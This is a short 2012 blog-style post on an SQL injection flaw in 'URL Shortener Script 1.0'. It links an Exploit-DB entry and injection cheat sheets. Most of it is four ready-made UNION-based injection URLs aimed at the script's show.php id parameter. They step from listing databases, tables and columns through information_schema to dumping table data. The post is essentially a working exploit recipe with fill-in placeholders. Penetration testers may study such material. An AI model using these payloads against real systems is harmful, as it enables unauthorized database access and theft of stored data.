OWASP Mantra - URL Shortener Script - SQL
Am Monday, 12. Mar 2012 im Topic 'Vulnerabilities'
URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17937/
SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/
How to : Create a simple url shortener script is a few minutes
http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a...
Exploit-DB URL: http://www.exploit-db.com/exploits/17937/
Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--
Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--
Getting columns: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--
Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --